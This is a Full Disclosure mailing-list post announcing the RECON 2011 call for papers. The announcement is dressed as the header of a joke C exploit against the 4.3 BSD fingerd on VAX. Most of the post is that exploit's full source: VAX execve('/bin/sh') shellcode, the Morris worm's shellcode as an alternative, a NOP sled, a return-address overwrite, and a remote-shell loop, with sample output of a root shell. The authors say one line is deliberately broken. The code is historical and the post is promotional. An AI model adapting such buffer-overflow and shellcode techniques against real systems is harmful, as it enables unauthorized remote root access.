Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RECON 2011 CFP
From: hfortier () recon cx
Date: Mon, 7 Mar 2011 02:40:50 -0500 (EST)

/*
+                    +                     +         +
                               +                  +           +
        +                                             +
                                     \ /
                    +     _        - _+_ -                   ,__
      _=.    .:.         /=\       _|===|_                  ||::|
     |  |    _|.        |   |     | |   | |     __===_  -=- ||::|
     |==|   |  |  __    |.:.|   /\| |:. | |    |   | .|| : |||::|
     |  |-  |.:|_|. :__ |.: |--|==| |  .| |_   | ' |. ||.  |||:.|
   __|. | |_|. | |.|...||---|  |==| |   | | |_--.     ||   |||. |
  |  |  |   |. | | |::.||: .|  |==| | . : |=|===|    :|| . ||| .|
  |:.| .|   |  | | |:.:|| . |  |==| |     |=|===| .   |'   | |  |
  |     |      |   |   |'           :   .   |   ;     ;    '    |
  '     :      `   :   '            .       '  .      .         :
  '     .                   R E C O N     2 0 1 1     .
  `                .                .                           '
                        .           C F P
 
0000000    REC0N 2011 (http://recon.cx)
0000020    JULY 8-10
0000040    HYATT REGENCY (New venue)
0000060    M0NTREAL
0000100    
0000120    + REC0N 2011
0000140     - Conference and training
0000160     - No censorship, no sales pitches 
0000200     - Videos from 2010 are coming online
0000220
0000240    + Now accepting submissions
0000260     - Single track
0000300     - 60 & 30 minute time slots
0000320     - Lightning talks at the party
0000340    
0000360    + Primary topics
0000400     - Reverse engineering and/or exploitation:
0000420       + Software
0000440         - Malware
0000460         - Protection/DRM
0000500         - Anti-reversing
0000520         - Static/runtime analysis
0000540       + Hardware
0000560         - Embedded devices, consoles, femtocell
0000600         - Cellphones
0000620         - RFID, SDR (software defined radio)
0000640         - Side channel attacks
0000660         - Physical security (cameras, access control)
0000700       + Protocol
0000720         - GSM / CDMA
0000740
0000760    + Also of interest to us
0001000     - Privacy
0001020       + Anti-censorship
0001040       + Anti-surveillance
0001060       + Anonymity
0001100       + Counter-forensics
0001120
0001140    + Anything else elite
0001160    
0001200    + Please include
0001220      - Short summary
0001240      - Name or alias
0001260      - Contact information
0001300      - Bio
0001320    
0001340    + Important dates
0001360      - Training/conference registration opens March 20, 2011
0001400      - First round of selections: April 10, 2011
0001420      - CFP closes May 15, 2011
0001440
0001460    + Send submissions to
0001500      - cfp2011 @ recon.cx
0001520
0001540    + Speaker / attendee privacy
0001560      - Recon does not require speakers use their real names
0001600      - Recon does not provide attendee or speaker information to third-parties 
0001620        (except where necessary for registration/payment)
 
 * w0rd, n0w ph0r th3 g00dz..
 * [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC]
 *
 * dr0pv4x.c
 * t0p-s3kR1t w4r3z k0m1n' @ ya 
 * str8 fr0m the k0d3l1n3
 *   -th3 phr3zh pr1nc3 0f b3llk0r3
 
 * w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2:
  
  route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup guys), 8lgm, 
  klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root () vax recon cx (lol), SN, Fravia, Mammon_, 
  m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham, lcamtuf, Ilfak,
  archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George, hypatia, tdz, Lady Gaga,
  Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm, das_modem, imm, 
  w1z4rd, l0renz, Subgraph & The Future Crew
 
 * a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz
 
 * st3p 1: c0mp1l3
 
 * st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4
  
         OLD WAREZ = NO WAREZ ;)
 
 * st3p 3: ./dr0pv4x [target] offset
   
          + pr3st0 +
 
 $ ./dropvax X.X.X.X -12345
 [+] ATDT X.X.X.X
 [+] CONNECT 9600
 [+] Return address: 0xUWISH
 [*] Compiled for little-endian arch.
 [+] Sent payload...
 [+] Shell!
 4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004
 16:56  up  6:08,  1 user,  load average: 0.09, 0.06, 0.03
 User     tty from           login@  idle   JCPU   PCPU  what
 root     co                  10:49     1                -sh -if
 whoami:
 root
 Warning: no access to tty; thus no job control in this shell...
 # exit
 
 k p8ce 0ut, 
   - dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3 
 
 Responsible Disclosure: 
 
 ++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0 
  f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++
 
 * [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] *
        (research purposes only!!!)
*/
 
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <errno.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
 
#ifdef BIG_ENDIAN_ARCH
 
#define bswap(value) \
    (((u32) (value)) << 24 |\
    (((u32) (value)) & 0x0000FF00) << 8 |\
    (((u32) (value)) & 0x00FF0000) >> 8 |\
    ((u32) (value)) >> 24)
 
#else
 
#define bswap(value) (value)
 
#endif
 
extern int errno;
 
int try_finger(char *, int);
void fdsh(int);
 
uint32_t typedef u32;
 
 
#ifndef USE_ALTERNATE_SHELLCODE         /* VAX-11 shellcode w/ explanation */
 
/* execve("/bin/sh", NULL, NULL) -
   Take advantage of the 4.3 BSD UNIX VM. 
   It always puts the process entry point (_start) at address 0x00000000.
   This gives us valid memory (a zero-byte string, since the first two bytes
   of procedures like _start on VAX (those called with "callg" instr.) are 
   the saved register-mask, and in _start's case this is zero (does not matter).  
   Furthermore, this line in kern_exec.c checks if:  
 
                if (ap == NULL && uap->envp) {
                        uap->argp = NULL;
                        ...
                }
 
   So we don't need a valid argv at address zero.
   See the VAX Architecture Reference Manual (VARM) or the 
   VAX Arcitecture Handbook.
 
   http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy 
   of the internal version of the VARM,
   which will help explain the stack frame and the instruction set.
*/
 
unsigned char shellcode[] =    
    "\021\017"         /* brb shellcode+0x11 (PC-relative) */ 
    "\272\001"         /* popr $0x1 (this is a mask: pop one word into r0) */ 
    "\335\000\335\000" /* pushl $0 ; pushl $0 */
    "\335P"            /* pushl %r0 (address of /bin/sh string) */
    "\335\003"         /* pushl $0x3 */
    "\320^\\"          /* movl %sp, %ap */
    "\274;"            /* chmk $0x3b (change mode to kernel, 0x3b = execve) */
    "\026\357\353"     /* jsb shellcode+0x4 (PC-relative) */
    "\377\377\377"  
    "/bin/sh";         /* .asciz "/bin/sh" */
 
#else /* USE_ALTERNATE_SHELLCODE */          /* RTMorris Internet Worm (1988) */
 
/* If you think the shellcode is the problem, try this one. */
 
u32 shellcode[] =
{
        bswap(0x732f8fdd),
        bswap(0x8fdd0068),
        bswap(0x6e69622f),
        bswap(0xdd5a5ed0),
        bswap(0xdd00dd00),
        bswap(0xd003dd5a),
        bswap(0x3bbc5c5e)
};
 
#endif 
 
 
#define Send(str) send(sock, (str), strlen(str), 0)
 
void fdsh(int sock)
{
    printf("[+] Sent payload...\n");
 
    sleep(1);
    Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
    Send("export PATH\n");
    Send("strings /vmunix | fgrep UNIX\n");
    Send("w ; echo whoami: ; whoami; exec csh -if\n");
 
    for (;;) {
        fd_set fds;
        char buf[2048];
        int nb;
 
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sock, &fds);
        if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            return;
        }
        if (FD_ISSET(0, &fds)) {
            nb = read(0, buf, sizeof(buf));
            if (nb <= 0) {
                perror("read(2)");
                return; 
            }
            send(sock, buf, nb, 0);
        }
        if (FD_ISSET(sock, &fds)) {
            nb = read(sock, buf, sizeof(buf));
            if (nb <= 0) {
                perror("read(2)");
                return;
            }
            write(1, buf, nb);
        }
    }
}
 
/* This routine exploits a fixed 512 byte input buffer in a VAX running
 * the BSD 4.3 fingerd binary.  It send 536 bytes (plus a newline) to
 * overwrite six extra words in the stack frame, including the return
 * PC, to point into the middle of the string sent over.  The instructions
 * in the string do the direct system call version of execve("/bin/sh"). */
 
/* From sp4f ^^^^^^^ (lolololol) */
 
/*
 * Here's what the VAX-11 stack frame looks like (from 4.3 BSD's <vax/frame.h>:
 */
#if 0
        struct frame {
                int     fr_handler;
                u_int   fr_psw:16,              /* saved psw */
                        fr_mask:12,             /* register save mask */
                        :1,
                        fr_s:1,                 /* call was a calls, not callg */
                        fr_spa:2;               /* stack pointer alignment */
                int     fr_savap;               /* saved arg pointer */
                int     fr_savfp;               /* saved frame pointer */
                int     fr_savpc;               /* saved program counter */
        };
#endif
 
int try_finger(char *host, int offset)
{
    int s, i;
    struct sockaddr_in sin = { 0 };   
    u32 retaddr = 0x7fffe8a8 - offset; 
    char buf[536];   
 
    sin.sin_family = PF_INET;
    sin.sin_port = htons(79);
    sin.sin_addr.s_addr = inet_addr(host);
 
    if (sin.sin_addr.s_addr == -1) {
       struct hostent *h;
       h = gethostbyname(host);
       if (h == NULL) {
          herror("gethostbyname(3)");
          return -1;
       }
       bcopy(h->h_addr, &sin.sin_addr, sizeof(u32));
    }
 
    if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
        perror("socket(2)");
        return -1;
    }
 
    printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr));
 
    if (connect(s, (void *)&sin, sizeof(sin)) < 0){
        perror("connect(2)");
        printf("[-] NO DIALTONE\n");
        return -1; 
    }
    
    printf("[+] CONNECT 9600\n");
 
    for (i = 0; i < 400; i++)
        buf[i] = '\001';       /* VAX-11 NOP */
 
    bcopy(shellcode, buf + 400, sizeof(shellcode));
 
    for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++)
        buf[i] = '\0';        /* VAX-11 HALT, try not to land on one. */
 
    printf("[+] Return address: %#x\n", retaddr);
 
#ifdef BIG_ENDIAN_ARCH
    printf("[*] Compiled for big-endian arch.\n");
#else
    printf("[*] Compiled for little-endian arch.\n");
#endif
 
    *((u32 *)buf + 128) = bswap(0x7fffeab0);
    *((u32 *)buf + 129) = bswap(0x7fffeb60);
    *((u32 *)buf + 130) = bswap(0x20000000);
    *((u32 *)buf + 131) = bswap(0x7fffeb64);
    *((u32 *)buf + 132) = bswap(retaddr);
    *((u32 *)buf + 133) = 0;
 
    send(s, buf, sizeof(buf), 0);       /* sizeof (buf) == 536 */ 
    send(s, "\n", 1, 0);
 
    fdsh(s);
    printf("[-] NO CARRIER\n");
    return 0;
}
 
main(int c, char **v)
{
    char *host = v[1], *ofs = v[2];
 
    if (!*(++v)) {
        fprintf(stderr, "usage: %s hostname [offset]\n", *(--v));
        exit(1);
    }
   
    if (c > 2)
        try_finger(host, atoi(ofs));
    else
        try_finger(host, 0);
 
    exit(0);
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • RECON 2011 CFP hfortier (Mar 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault